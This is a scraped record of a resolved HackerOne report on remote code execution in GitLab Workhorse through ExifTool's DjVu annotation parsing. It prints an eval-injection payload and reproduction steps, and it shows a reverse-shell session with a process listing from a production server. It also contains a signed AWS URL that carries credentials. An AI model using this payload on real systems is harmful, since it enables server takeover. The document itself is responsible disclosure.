Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T04:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T04:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T04:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYSXG5A2G%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T042945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHUaCXVzLXdlc3QtMiJIMEYCIQDxJ6xkFBHM0iygaDWfc493m34YtR0V%2F4JenvB5ZmyW5QIhAOSsxx%2FVOA5%2FieYs0%2BXM9pfZcUY8CgWn9KzUXAoanX81KoMECP3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQAhoMMDEzNjE5Mjc0ODQ5IgyefAm%2FcVRXKw%2FY%2FHoq1wN7a1mOf5e6u4Z2m1X2X0tldLijvpueNEGghqiVnrH4wHbjOTtRrNRF5gcy5c6tymxuNd%2BwmfFyHuhUhwlzhUvQTd%2BgLCX0Tx%2Bz0jhBpo7g%2BtXjmX%2F3P%2BmGufQLV5z9CrMAw9bq0AVAgKOTFQA3Cwzo1KvDQnOPMreMEgSx9382ECmmc73fzowTMoJhj6iVescbqNkBTwnyAf4IDit%2FcRv0Ct3icY0mQ1ej0QtHF3lnOhB8W%2FpTIsiaQ7sGBesHDGZUptHoaT2DuRu0SCseivaDZGoxL68D7YIoDkK58gnb2tmA0MR%2F41ayZhw0gxJiVoulUQzeyXqV5xjB7bOSl7LkKTKYXa4KcjVZECurButJxCnjUh4xIHmtrjXqetmiEoFkyLdGihA21Fh4HTuPJHhOCbz%2FteEnwveKIyJMAFpsCWDXnSlqJ%2BCnAv3QPlEFJU1LndMw2jrE1H5s8SNm%2FFKiHvP7hFON9MJblN6%2B4cgvARm6ERwrXkEBfoUDZ3rYKN5eVvGfc3S%2FgVQnX%2F%2BVcwLJIxB86qRVnPSsbKmwrXVSAbkdpp4tv%2BlVbV3POb6v5RkskolasPZ08VshEVMWe0PEJ7mlwyoEOvoeAL3ASSc3WDAxFJF03zEwipf9hAY6pAFNGdV0pg2rm4oh04U7aNr5RWUD%2BFCKUggaSdrPP4Zf17XAq5GzeLFa1r%2FVd9reJ3gZPxhcpl%2FpnU7THBjXxpcxfYNmq0LyGQP6rGv5CE%2FF9cHt78rkTzGhshKF46bwyDYGMIR7tDHb5jaiFUpMzBk7Y60uXiflc87Lw3WS77GvNhtu8vviPmLobxMacWqiRww4zZxnvStQ9XXB838ob2n%2FydFvXw%3D%3D&X-Amz-Signature=b2743628491370d9ae043e4d23f7582c589951bebe3a7802d52659cb6b6bf0b8"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T04:29:46", "differentElements": ["h1reporter"], "edition": 9}, {"bulletin": {"id": "H1:1154542", "hash": "70039d6bab0ce947847835fa2624d31a", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 